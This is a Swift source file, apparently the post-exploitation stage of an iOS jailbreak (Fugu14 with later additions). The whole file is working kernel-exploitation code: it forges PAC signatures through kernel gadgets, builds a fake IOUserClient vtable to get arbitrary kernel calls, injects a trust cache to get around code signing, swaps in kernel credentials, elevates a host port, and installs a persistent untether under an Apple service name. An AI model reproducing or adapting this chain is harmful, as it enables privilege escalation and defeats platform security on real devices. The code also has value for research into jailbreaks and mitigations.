let prot = UInt64(VM_PROT_READ | VM_PROT_WRITE)
let fault_type: UInt64 = 0
let flags: UInt64 = 0
let wired: UInt64 = 1
let options: UInt64 = 1
while true {
let res = try kcall(function: slide(offsets.functions.pmap_enter_options_addr), p1: pmap, p2: va, p3: pa, p4: prot, p5: fault_type, p6: flags, p7: wired, p8: options)
if res != KERN_RESOURCE_SHORTAGE {
return res
}
}
}
/*
* Injects a new *empty* trust cache.
* The trust cache has the number of entries specified.
* All the entries are set to random values.
*/
func injectEmptyTrustCache(space: UInt32) throws -> UInt64 {
#if false
if pmap_image4_trust_caches == nil {
// Get pmap
let pmap: Pmap! = thisProc.unsafelyUnwrapped.task?.vmMap?.pmap
guard pmap != nil else {
throw PostExploitationError.failedToFindMyProcPMap
}
// Map PPL (for pmap_image4_trust_caches)
let tcPtrVirt = slide(offsets.loadedTCRoot)
let tcVirtPage = tcPtrVirt & ~0x3FFF
let tcOff = tcPtrVirt & 0x3FFF
let tcPhysPage = try mem.virt2phys(tcVirtPage)
let mapRes = try pmapMapPA(pmap: pmap.addr, pa: tcPhysPage, va: 0x41420000)
guard mapRes == KERN_SUCCESS else {
Logger.fmt("Result: %d", mapRes)
throw PostExploitationError.failedToInjectTrustCache
}
pmap_image4_trust_caches = UnsafeMutablePointer<Int64>(bitPattern: UInt(0x41420000 + tcOff))!
}
// Build our trust cache
let sz = 0x10 + 0x18 + (UInt64(space) * 22)
let buf = try kcall(function: slide(offsets.functions.kalloc), p1: sz)
guard buf != 0 else {
throw PostExploitationError.kernelOutOfMemory
}
let listEntry = buf
let ourTc = buf + 0x10
// List entry must point to our trust cache
try mem.w64(virt: listEntry + 0x8, data: ourTc)
// Setup tc
// 0x0 -> Version
// 0x4 -> UUID (16 bytes)
// 0x14 -> Number of entries
try mem.w32(virt: ourTc, data: 1)
try mem.writeBytes(virt: ourTc + 0x4, data: "Fugu14 Jailbreak".data(using: .utf8)!)
try mem.w32(virt: ourTc + 0x14, data: space)
// Now inject our tc
// Make sure this is atomic
while true {
// Read current
let cur = UInt64(bitPattern: pmap_image4_trust_caches.pointee)
// Write into our list entry
try mem.w64(virt: listEntry, data: cur)
// Attempt to replace
if OSAtomicCompareAndSwap64(Int64(bitPattern: cur), Int64(bitPattern: listEntry), pmap_image4_trust_caches) {
break
}
}
return ourTc
#endif
fatalError("not implemented")
}
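// Signs `value` with the DA key via a kernel PACDA gadget. The gadget appears
// to take the value in x1 and the context in x9 (optionally blended with
// `blendFactor` in the top 16 bits, mirroring ptrauth_blend_discriminator)
// and to store the signed result through x8, here into a scratch slot on the
// kernel stack that is read back afterwards.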
func pacda(value: UInt64, context: UInt64, blendFactor: UInt16? = nil) throws -> UInt64 {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
var ctx = context
if let factor = blendFactor {
ctx = (ctx & ~0xFFFF000000000000) | (UInt64(factor) << 48)
}
let callThread = self.callThread!
let buf = callThread.stackPtr - 0x7FF0
var state = arm_thread_state64_t()
state.__x.1 = value
state.__x.2 = 0
state.__x.8 = buf
state.__x.9 = ctx
_ = try _kcall(function: slide(offsets.functions.pacdaGadget), state: state)
return try mem.r64(virt: buf)
}
// WARNING: Patchfinder currently doesn't find the required gadget
// Calling this function *will* trigger a panic
func pacia(value: UInt64, context: UInt64, blendFactor: UInt16? = nil) throws -> UInt64 {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
var ctx = context
if let factor = blendFactor {
ctx = (ctx & ~0xFFFF000000000000) | (UInt64(factor) << 48)
}
var state = arm_thread_state64_t()
state.__x.8 = 0xDEADBEEF
state.__x.16 = value
state.__x.17 = ctx
state.__cpsr = 0x40000000
return try _kcall(function: slide(offsets.functions.paciaGadget), state: state)
}
static let copyout_atomic32_address: UInt64 = 0xfffffff00826dcfc
static let copyout_atomic32_pacia_address: UInt64 = 0xfffffff00826dd1c
var copyout_atomic32_saved_br_x22_lr: UInt64 = 0
func setupPaciaBadly() throws {
guard let callThread = callThread else {
throw PostExploitationError.noKernelThread
}
// we need a fake return address that can stand up to retab
// so we need to call copyout_atomic32 once, and grab its signed return address off the stack
let buf = callThread.stackPtr - 0x7FF0
// copyout_atomic32(0x12345678, buf);
// we don't care about it actually writing; I just need the stack
_ = try kcall(function: slide(PostExploitation.copyout_atomic32_address),
p1: 0x12345678, p2: buf)
let lraddr = callThread.x22Ptr - 0xB0 + (30 * 8)
let lrvalue = try mem.r64(virt: lraddr)
print(String(format: "lrvalue = %lx", lrvalue))
copyout_atomic32_saved_br_x22_lr = lrvalue
}
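// Signs `value` with the IA key without a dedicated gadget: jump into
// copyout_atomic32 at (what is assumed to be) its pacia instruction with
// x16/x17 preloaded, using a fake stack frame whose saved lr is the signed
// return address captured by setupPaciaBadly, so the function's authenticated
// epilogue still returns cleanly into the br x22 loop. The signed value is
// then read back from x17 in the exception frame.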
func paciaBadly(value: UInt64, context: UInt64, blendFactor: UInt16? = nil) throws -> UInt64 {
// copy of pacia, but with copyout_atomic32 instead.
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
guard let callThread = callThread else {
throw PostExploitationError.noKernelThread
}
var ctx = context
if let factor = blendFactor {
ctx = (ctx & ~0xFFFF000000000000) | (UInt64(factor) << 48)
}
let buf = callThread.stackPtr - 0x7FF0
let brX22Gadget = slide(offsets.functions.brX22)
// We set up a fake stack frame
var state = arm_thread_state64_t()
state.__x.0 = 0x12345678
state.__x.1 = buf
state.__x.16 = ctx
state.__x.17 = value
state.__fp = callThread.stackPtr - 16
state.__sp = callThread.stackPtr - 16
state.__lr = 0xaaaabbbbccccdddd
state.__pc = slide(PostExploitation.copyout_atomic32_pacia_address)
state.__x.21 = callThread.returnState
state.__x.22 = brX22Gadget
// on stack: old fp
try mem.w64(virt: callThread.stackPtr - 16, data: callThread.stackPtr)
// and old lr
try mem.w64(virt: callThread.stackPtr - 8, data: copyout_atomic32_saved_br_x22_lr)
_ = try _kcall(function: 0, state: state, x1out: nil, dontTouchMyGarbage: true)
let x17addr = callThread.x22Ptr - 0xB0 + (17 * 8)
return try mem.r64(virt: x17addr)
}
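// Resolves a Mach port name to its kernel ipc_port pointer by indexing this
// task's is_table (0x18 bytes per entry, entry index = port name >> 8).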
func getPortPointer(_ port: mach_port_t) throws -> UInt64 {
guard let tbl = thisProc.task?.itk_space?.is_table else {
throw PostExploitationError.failedToGetPortTable
}
let kPort = try mem.rPtr(virt: tbl + (UInt64(port >> 8) * 0x18))
return kPort
}
func getPortKobject(_ port: mach_port_t) throws -> UInt64 {
let kPort = try getPortPointer(port)
// Get its bits
let bits = try mem.r32(virt: kPort)
if (bits & 0x400) != 0 {
// Labeled, return kobject from label
let label = try mem.rPtr(virt: kPort + 0x68)
return try mem.rPtr(virt: label + 0x8)
}
// Not labeled
return try mem.rPtr(virt: kPort + 0x68)
}
func fixPMBug() throws {
// After *hours* of testing, @Pwn20wnd and I *finally* came up with a solution
// Apparently, loading codeless kexts causes freezes to happen
// No idea why, but unloading them fixes the bug
// Requires kcall unfortunately :/
var kr: kern_return_t = 0
if let loaded = try? sendKextRequestWithReply(req: ["Kext Request Predicate": "Get All Load Requests", "Kext Request Arguments": ["Kext Request Info Keys": ["CFBundleIdentifier"]]], res: &kr) as? [String] {
Logger.print("Attempting to unload unneeded dexts!")
let gIOCatalogue = try mem.rPtr(virt: slide(offsets.gIOCatalogue))
let terminateDriversForModule = slide(offsets.functions.terminateDriversForModule)
// Allocate a buffer
// (Which we'll leak...)
let buf = try kcall(function: slide(offsets.functions.kalloc), p1: 1024)
for kext in loaded {
if kext.starts(with: "de.linushenze.pwn-") {
// Write name into our buffer...
try mem.writeBytes(virt: buf, data: kext.data(using: .utf8)! + Data(count: 1) /* null byte */)
// Try to unload it!
try kcall_oneshot(function: terminateDriversForModule, p1: gIOCatalogue, p2: buf, p3: 1)
}
}
Logger.print("Unloaded unneeded dexts!")
}
}
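// Swaps the target proc's p_ucred for the kernel proc's credentials. The new
// pointer is PACDA-signed against the field address (blend factor 0x84E8, the
// discriminator used for this field here), and the previous signed value is
// returned so restoreCreds can put it back.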
func giveKernelCreds(toProc: Proc? = nil) throws -> UInt64 {
let toProc = toProc ?? thisProc.unsafelyUnwrapped
let myCredAddr = toProc.addr + offsets.procStruct.ucred
let saved = try mem.r64(virt: myCredAddr)
let krnlCred = kernelProc.unsafelyUnwrapped.ucred!.addr
let signed = try pacda(value: krnlCred, context: myCredAddr, blendFactor: 0x84E8)
try mem.w64(virt: myCredAddr, data: signed)
return saved
}
func restoreCreds(saved: UInt64) throws {
let myCredAddr = thisProc.addr + offsets.procStruct.ucred
try mem.w64(virt: myCredAddr, data: saved)
}
@discardableResult
func untether() -> MountResult {
// Remove unused closures
if let closures = try? FileManager.default.contentsOfDirectory(atPath: untetherClFolder + "/Caches/com.apple.dyld") {
for c in closures {
let keep = [".", "..", "analyticsd.closure", "logd.closure", "stage2.closure"]
if !keep.contains(c) {
try? FileManager.default.removeItem(at: URL(fileURLWithPath: c, relativeTo: URL(fileURLWithPath: untetherClFolder + "/Caches/com.apple.dyld")))
}
}
}
do {
let mountRes = try MountPatch(pe: self).remount(launchd: launchdProc.unsafelyUnwrapped, installCallback: { mountPath in
// This should never happen
throw PostExploitationError.untetherNotInstalled
})
return mountRes
} catch PostExploitationError.failedToFindLaunchd {
return .failed(reason: "Failed to find launchd")
} catch _ {
return .failed(reason: "Failed to mount root fs")
}
}
func install(doUpdate: Bool = false) -> MountResult {
func checkForFile(withName name: String, env: String, acCheck: Int32 = R_OK) -> String? {
var file: String?
if let dir = Bundle.main.resourcePath {
file = dir + "/" + name
}
if let fileEnv = getenv(env) {
file = String(cString: fileEnv)
}
guard file != nil else {
Logger.print("\(name) not found!")
return nil
}
guard access(file, acCheck) == 0 else {
Logger.print("\(name) failed perm check!")
return nil
}
return file
}
// Check for tar
guard let tar = checkForFile(withName: "tar", env: "FUGU_TAR") else {
return .failed(reason: "Tar not found!")
}
chmod(tar, 0o777)
guard access(tar, X_OK) == 0 else {
Logger.print("Tar not executable!")
return .failed(reason: "Tar not executable!")
}
// Check for bootstrap
guard let bootstrap = checkForFile(withName: "bootstrap.tar", env: "FUGU_BOOTSTRAP") else {
return .failed(reason: "Bootstrap not found!")
}
// Check for trustcache
guard let trustcache = checkForFile(withName: "trustcache", env: "FUGU_TRUSTCACHE") else {
return .failed(reason: "Trustcache not found!")
}
// Check for com.apple.analyticsd.plist
guard let svPlist = checkForFile(withName: "com.apple.analyticsd.plist", env: "FUGU_SERVICE_PLIST") else {
return .failed(reason: "Service plist not found!")
}
// Inject trust cache
guard injectTC(path: trustcache) else {
return .failed(reason: "Failed to inject trust cache")
}
do {
// Fix the power management bug
try fixPMBug()
// Mount the filesystem and install the untether
Logger.print("Mounting root file system...")
func installCallback(mountPath: String) throws {
// Extract tar
Logger.print("Extracting bootstrap...")
chdir(mountPath)
let res = runWithKCreds(pe: self, prog: tar, args: ["-xvf", bootstrap])
guard res else {
throw PostExploitationError.failedToExtractBootstrap
}
if !fastUntetherEnabled {
// Copy service plist
Logger.print("Copying service plist...")
try? FileManager.default.createDirectory(atPath: mountPath + "/Library/LaunchDaemons", withIntermediateDirectories: true, attributes: [.posixPermissions: 0o755, .ownerAccountID: 0, .groupOwnerAccountID: 0])
try? FileManager.default.removeItem(atPath: mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist")
try FileManager.default.copyItem(atPath: svPlist, toPath: mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist")
chmod(mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist", 0o644)
chown(mountPath + "/Library/LaunchDaemons/com.apple.analyticsd.plist", 0, 0)
// Ensure launchctl exists and is executable
guard access(mountPath + "/.Fugu14Untether/bin/launchctl", X_OK) == 0 else {
throw PostExploitationError.launchctlCheckFailed
}
}
// If this is an AltStore build, write magic file
if altStoreBuild {
creat(mountPath + "/.Fugu14Untether/.AltStoreInstall", 0o666)
}
// Install untether
Logger.print("Installing untether...")
if fastUntetherEnabled {
Logger.print("!!! FAST UNTETHER ENABLED !!!")
try installFastUntether(mountPath: mountPath, trustcache: trustcache, isUpdate: doUpdate)
} else {
try installSlowUntether(mountPath: mountPath, trustcache: trustcache, isUpdate: doUpdate)
}
}
if !doUpdate {
let result = try MountPatch(pe: self).remount(launchd: launchdProc.unsafelyUnwrapped, installCallback: installCallback)
if case .ok = result {
// Apparently, the user was already jailbroken
// The rootfs is now mounted r/w
// Check if there is at least one snapshot
// Otherwise, create one
if fastUntetherEnabled {
Logger.print("!!! REFUSING TO INSTALL FAST UNTETHER !!!")
Logger.print("!!! PLEASE RESTORE ROOTFS FIRST !!!")
return .failed(reason: "Refusing to install fast untether - restore RootFS first!")
}
Logger.print("RootFS not snapshot mounted")
Logger.print("Checking if at least one snapshot exists")
var res: MountResult = .failed(reason: "Unknown error!")
_ = withFD(file: "/") { fd in
var attr = attrlist()
guard let buf = malloc(2048) else {
Logger.print("Malloc failed!")
res = .failed(reason: "Malloc failed!")
return false
}
defer { free(buf) }
attr.commonattr = ATTR_BULK_REQUIRED
let count = fs_snapshot_list(fd, &attr, buf, 2048, 0)
guard count >= 0 else {
Logger.print("fs_snapshot_list failed!")
res = .failed(reason: "fs_snapshot_list failed!")
return false
}
if count == 0 {
Logger.print("No snapshot found. Creating one.")
guard fs_snapshot_create(fd, "orig-fs", 0) == 0 else {
Logger.print("Failed to create snapshot!")
res = .failed(reason: "Failed to create snapshot!")
return false
}
Logger.print("Created orig-fs snapshot, continuing install")
} else {
Logger.print("At least one snapshot exists, continuing install")
}
// There was at least one snapshot or we created one
// Allow the install to continue
do {
try installCallback(mountPath: "/")
res = .rebootRequired
return true
} catch let e {
res = .failed(reason: "Failed to install untether: \(e)")
}
return false
}
return res
}
return result
} else {
do {
try installCallback(mountPath: "/")
return .rebootRequired
} catch let e {
return .failed(reason: "Failed to update untether: \(e)")
}
}
} catch PostExploitationError.failedToFindLaunchd {
return .failed(reason: "Failed to find launchd")
} catch let e {
return .failed(reason: "Failed to install untether: \(e)")
}
}
static func uninstall() -> RestoreResult {
Logger.print("Uninstalling untether")
let restoreRes = MountPatch.restoreRootfs()
if case .rebootRequired = restoreRes {
// Remove untether
try? FileManager.default.removeItem(atPath: untetherContainerPath)
chflags(untetherClPathLogd, 0)
chflags(untetherClPathAnalytics, 0)
chflags(untetherClPathPs, 0)
try? FileManager.default.removeItem(atPath: untetherClFolder)
}
return restoreRes
}
func mountOnly() {
Logger.print("Remounting root fs")
let res = MountPatch(pe: self).remount(launchd: launchdProc.unsafelyUnwrapped) { mntPath in
// Nothing
}
Logger.print("Mount result: \(res)")
}
@discardableResult
func injectTC(path: String) -> Bool {
guard let data = try? Data(contentsOf: URL(fileURLWithPath: path)) else {
Logger.print("Failed to read trust cache!")
return false
}
// Make sure the trust cache is good
guard data.count >= 0x18 else {
Logger.print("Trust cache is too small!")
return false
}
let vers = data.getGeneric(type: UInt32.self)
guard vers == 1 else {
Logger.fmt("Trust cache has bad version (must be 1, is %u)!", vers)
return false
}
let count = data.getGeneric(type: UInt32.self, offset: 0x14)
guard data.count == 0x18 + (Int(count) * 22) else {
Logger.fmt("Trust cache has bad length (should be %p, is %p)!", 0x18 + (Int(count) * 22), data.count)
return false
}
Logger.print("Trust cache looks good, attempting to load...")
do {
// Setup kernel call
Logger.print("Setting up kernel call gadget...")
if !setupKernelCall() {
Logger.print("Failed to set up kernel call gadget!")
exit(-1)
}
Logger.print("Injecting trust cache...")
// Create an empty trust cache, then replace its content
let tcKern = try injectEmptyTrustCache(space: count)
try mem.writeBytes(virt: tcKern + 0x18, data: data.tryAdvance(by: 0x18))
Logger.print("Successfully injected trust cache!")
return true
} catch let e {
Logger.print("Failed, error: \(e)")
}
return false
}
func killMe() {
if userClient != 0 {
do {
try destroyIOConnectTrap6Port()
} catch let e {
print("Can't destroyIOConnectTrap6Port: \(e)")
}
}
if callThread != nil {
kill(callThread.unsafelyUnwrapped.pid, SIGKILL)
}
// Kill myself
kill(getpid(), SIGKILL)
}
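// Publishes the DriverKit kernel-r/w handles for later pickup: the port names
// and mapping address are written to a "magic" page whose address is stashed
// past the dyld all-image info, an unprivileged host port borrowed from a
// uid-501 process is flipped to the privileged variant, the DriverKit ports
// are unlabeled, our task port is made movable, and a forked child installs
// it as HOST_CLOSURED_PORT. Returns 0 on success, a small error code otherwise.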
func initKrwSupport() -> Int32 {
do {
// Prepare all stuff
let info = mem.getKrwData()
var magicData = Data(fromObject: 0x75677546 as UInt32)
magicData.appendGeneric(value: info.dkSvPort)
magicData.appendGeneric(value: info.ucPort)
magicData.appendGeneric(value: info.physMemDesc)
magicData.appendGeneric(value: info.dmaPort)
magicData.appendGeneric(value: info.dmaDesc)
magicData.appendGeneric(value: info.mapAddr)
// Allocate a "magic" page
var addr: vm_address_t = 0
var kr = vm_allocate(mach_task_self_, &addr, 0x100, VM_FLAGS_ANYWHERE)
guard kr == KERN_SUCCESS else {
return 1
}
// Write address into dyld infos
var dyldInfo = task_dyld_info()
var infoCnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: dyldInfo) >> 2)
kr = withUnsafeMutablePointer(to: &dyldInfo) { ptr in
task_info(mach_task_self_, task_flavor_t(TASK_DYLD_INFO), task_info_t(OpaquePointer(ptr)), &infoCnt)
}
guard kr == KERN_SUCCESS else {
return 6
}
let ptr = UnsafeMutablePointer<vm_address_t>(bitPattern: UInt(dyldInfo.all_image_info_addr) + 0xFF0)!
ptr.pointee = addr
// Write data to "magic" page
magicData.copyBytes(to: UnsafeMutablePointer<UInt8>(bitPattern: addr)!, count: magicData.count)
// Patch mach host port
// Find a process which does not have a privileged host port
var cur: Proc! = Proc.getFirstProc(pe: self)
var hostPort: mach_port_t = 0
while cur != nil {
if let uid = cur.ucred?.cr_uid {
if uid == 501 {
// Okay, try to get the host port from this process
var tp: mach_port_t = 0
kr = task_for_pid(mach_task_self_, Int32(bitPattern: cur.pid), &tp)
if kr == KERN_SUCCESS {
kr = task_get_special_port(tp, TASK_HOST_PORT, &hostPort)
mach_port_deallocate(mach_task_self_, tp)
if kr == KERN_SUCCESS {
break
}
}
}
}
cur = cur.next
}
guard hostPort != 0 else {
return 2
}
defer { mach_port_deallocate(mach_task_self_, hostPort) }
// Get the unprivileged host port
guard let tbl = thisProc.task?.itk_space?.is_table else {
return 3
}
let port = try mem.rPtr(virt: tbl + (UInt64(hostPort >> 8) * 0x18))
let bits = try mem.r32(virt: port)
guard bits == 0x80000803 else {
return 4
}
// Make it privileged
try mem.w32(virt: port, data: 0x80000804)
func unlabelPort(_ port: mach_port_t) throws {
let kPort = try mem.rPtr(virt: tbl + (UInt64(port >> 8) * 0x18))
// Get the label pointer
let labelPtr = try mem.rPtr(virt: kPort + 0x68)
// Unlabel
try mem.w64(virt: labelPtr, data: 0)
}
// Unlabel DriverKit ports
do {
try unlabelPort(info.dkSvPort)
try unlabelPort(info.ucPort)
try unlabelPort(info.physMemDesc)
try unlabelPort(info.dmaPort)
try unlabelPort(info.dmaDesc)
} catch _ {
return 5
}
// Make our task port moveable
let kTaskPort = try mem.rPtr(virt: tbl + (UInt64(mach_task_self_ >> 8) * 0x18))
try mem.w16(virt: kTaskPort + 0x26, data: 0)
mach_port_insert_right(mach_task_self_, mach_task_self_, mach_task_self_, mach_msg_type_name_t(MACH_MSG_TYPE_COPY_SEND))
typealias fType = @convention(c) () -> pid_t
let fork = unsafeBitCast(dlsym(dlopen(nil, 0), "fork"), to: fType.self)
let child = fork()
if child == 0 {
// Set us as HOST_CLOSURED_PORT
var parentTP: mach_port_t = 0
kr = task_for_pid(mach_task_self_, getppid(), &parentTP)
guard kr == KERN_SUCCESS else {
exit(kr)
}
kr = host_set_special_port(mach_host_self(), HOST_CLOSURED_PORT, parentTP)
exit(kr)
}
var status: Int32 = 0
waitpid(child, &status, 0)
return status
} catch {
return 1337
}
}
// two instructions past thread_call_invoke
// found by searching braa x3, x4
static let thread_call_invoke_past_two: UInt64 = 0xfffffff007bbce3c
// search for 00 00 01 91 c0 03 5f d6
static let add_x0_x0_0x40_ret_gadget: UInt64 = 0xfffffff007bc0e70
// used a print statement (the realVtable line below)
let startOfUserClientVtable: UInt64 = 0xfffffff0079529d0
let endOfUserClientVtable: UInt64 = 0xfffffff007952fa8
var userClient: mach_port_t = 0
var userClientPortAddr: UInt64 = 0
var userClientAddr: UInt64 = 0
// zhuowei: create a Mach port that allows calling kernel functions with 2 arguments.
// It's implemented as a fake IOUserClient pointing at thread_call_invoke:
// IOConnectTrap6(user_client, 0, arg1, arg2, function_ia_signed_ptr, discriminator)
// https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1731
func createIOConnectTrap6Port() throws -> mach_port_t? {
if userClient != 0 {
return userClient
}
let kexecuteGadgetUnsigned:UInt64 = slide(PostExploitation.add_x0_x0_0x40_ret_gadget)
// https://github.com/Odyssey-Team/Taurine/blob/0ee53dde05da8ce5a9b7192e4164ffdae7397f94/Taurine/post-exploit/utils/kexec/kexecute.swift#L42
let offset_ip_kobject:UInt64 = 0x68
let service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"))
var user_client = mach_port_t(MACH_PORT_NULL)
guard IOServiceOpen(service, mach_task_self_, 0, &user_client) == KERN_SUCCESS else {
return nil
}
userClientPortAddr = try getPortPointer(user_client)
let userClientBits = try mem.r32(virt: userClientPortAddr)
userClientAddr = try mem.r64(virt: userClientPortAddr + offset_ip_kobject)
print(String(format: "userClientPortAddr = %lx userClientBits = %lx userClientAddr = %lx", userClientPortAddr, userClientBits, userClientAddr))
//return nil
let fakeVtable = try kcall(function: slide(offsets.functions.kalloc), p1: 0x2000)
let fakeUserClient = fakeVtable + 0x1000
guard fakeVtable != 0,
fakeUserClient != 0 else {
return nil
}
print("Defense Matrix activated!")
print(String(format: "fake vtable: 0x%llx, fake user client: 0x%llx", fakeVtable, fakeUserClient))
// TODO(zhuowei)
// Note that this is different from
// https://github.com/apple/llvm-project/blob/apple/main/clang/docs/PointerAuthentication.rst#c-virtual-tables
// the blend factors: 1) got from iokit_user_client_trap disassembly
let fakeVtableSigned = try pacda(value: fakeVtable,
context: fakeUserClient, blendFactor: 0xcda1)
// 2) put XNU_PTRAUTH_SIGNED_PTR("ipc_port.kobject") into a C file and compiled
let fakeUserClientSigned = try pacda(value: fakeUserClient,
context: userClientPortAddr + offset_ip_kobject, blendFactor: 0xb527)
// 3) checked getTargetAndTrapForIndex
let kexecuteGadget:UInt64 = try paciaBadly(value: kexecuteGadgetUnsigned,
context: fakeVtable + UInt64(8 * 0xb8), blendFactor: 0xea23)
// 4) iokit_user_client_trap
let threadCallInvokePastTwoSigned:UInt64 = try paciaBadly(value: slide(PostExploitation.thread_call_invoke_past_two), context: 0x705d)
print(String(format: "fake vtable signed: 0x%llx, fake user client signed: 0x%llx, gadget signed: 0x%llx",
fakeVtableSigned, fakeUserClientSigned, kexecuteGadget))
let signedVtable = try bulkSignVtable(newTableBase: fakeVtable)
//let realVtable = try mem.r64(virt: stripPtr(userClientAddr))
//print(String(format: "real vtable = %lx (%lx unslid)", realVtable, stripPtr(realVtable) - mem.kernelSlide))
//let vtableData = try mem.readBytes(virt: stripPtr(realVtable), count: 0x1000)
try mem.writeBytes(virt: fakeVtable, data: signedVtable)
// thankfully nothing in IOUserClient is signed...
let realUserClientData = try mem.readBytes(virt: stripPtr(userClientAddr), count: 0x1000)
try mem.writeBytes(virt: fakeUserClient, data: realUserClientData)
try mem.w64(virt: fakeVtable + UInt64(8 * 0xb8), data: kexecuteGadget)
try mem.w64(virt: fakeUserClient, data: fakeVtableSigned)
try mem.w64(virt: userClientPortAddr + offset_ip_kobject, data: fakeUserClientSigned)
try mem.w64(virt: fakeUserClient + 0x40, data: 0x12345678facef00d)
try mem.w64(virt: fakeUserClient + 0x48, data: threadCallInvokePastTwoSigned)
try mem.w64(virt: fakeUserClient + 0x50, data: 0)
userClient = user_client
return user_client
}
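// Builds a PAC-signed copy of the IOUserClient vtable for a new location. The
// slots come from the on-disk kernelcache, where (in this simplified reading
// of the chained-fixup format) the low 32 bits hold the unslid target and
// bits 32..47 the PAC diversifier; each entry is re-signed with paciaBadly
// against its new slot address.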
func bulkSignVtable(newTableBase: UInt64) throws -> Data {
let unslidVirtBase: UInt64 = 0xFFFFFFF007004000
let beginVtableInKernelFile = startOfUserClientVtable - unslidVirtBase
let vtableSize = endOfUserClientVtable - startOfUserClientVtable
let slicedVtable = MemoryAccess.kernelFromDisk[beginVtableInKernelFile..<(beginVtableInKernelFile + vtableSize)]
let newKernelBase = slide(unslidVirtBase)
// bad implementation of rebase_chain
var signedVtable = Data(count: Int(vtableSize))
for index in 0..<(vtableSize / 8) {
let byteOffset = index * 8
let value = slicedVtable.getGeneric(type: UInt64.self, offset: UInt(byteOffset))
let newPointer = newKernelBase + (value & 0xffffffff)
let newLocation = newTableBase + byteOffset
let discriminator = (value >> 32) & 0xffff
let tableSigned:UInt64 = try paciaBadly(value: newPointer, context: newLocation, blendFactor: UInt16(discriminator))
//print(String(format: "%x value = %lx discriminator = %lx newPointer = %lx newLocation = %lx tableSigned = %lx", index, value, discriminator, newPointer, newLocation, tableSigned))
signedVtable[byteOffset..<(byteOffset + 8)] = Data(fromObject: tableSigned)
}
return signedVtable
}
func destroyIOConnectTrap6Port() throws {
let offset_ip_kobject:UInt64 = 0x68
try mem.w64(virt: userClientPortAddr + offset_ip_kobject, data: userClientAddr)
IOServiceClose(userClient)
}
let hvHeapAddress: UInt64 = 0xfffffff009b43190
let zone_create_ext: UInt64 = 0xfffffff007bd43bc
let hv_vm_string: UInt64 = 0xfffffff00745a056
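// If the global hypervisor heap pointer at hvHeapAddress is still NULL,
// create the zone by calling zone_create_ext with the hv_vm name string from
// the kernelcache and store the result, presumably so later hypervisor
// allocations have a valid heap to work with.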
func initializeHvHeap() throws {
let currentHeap = try mem.r64(virt: slide(hvHeapAddress))
if currentHeap != 0 {
return
}
let newHeap = try kcall(function: slide(zone_create_ext), p1: slide(hv_vm_string),
p2: 0x2080, p3: 0x10000000, p4: 0xffff, p5: 0)
try mem.w64(virt: slide(hvHeapAddress), data: newHeap)
}
deinit {
killMe()
}
}